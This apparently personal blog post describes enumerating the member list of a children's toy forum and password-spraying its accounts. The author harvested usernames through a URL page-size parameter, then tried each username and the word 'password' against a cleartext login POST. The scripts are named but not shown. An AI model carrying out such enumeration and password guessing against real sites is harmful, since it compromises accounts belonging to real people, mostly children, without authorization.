Bakugan Horizontal Brute Force
Doing a little TV hacking, I ran across the anime toy tie-in, Bakugan, and
my.bakugan.com, the forums for said tie-in. I registered for the forums and
checked out the member list. It listed 30, 60 or 90 users at a pop with that
number in the URL. With 18,000+ members, I'd rather up that number. Ten
thousand didn't work, nor did five. One thousand worked and finally two
thousand.
After grabbing the pages, I grepped for the single line that held the users.
grep_for_users.txt
Then I wrote a little perl script to get the users from those files.
getusers.pl
With all of the users in one text file, it was time to
figure out how to authenticate. Well, everything's sent in a clear text POST.
Simple. Another perl script to iterate through the users using passwords of
their user name and "password."
bakugan.pl
Here's the output. Three percent of users, granted
mostly kids, use a weak password, with two-thirds of those using their user
name. The important lesson is that user enumeration is at least as valuable
to an adversary as unlimited login attempts.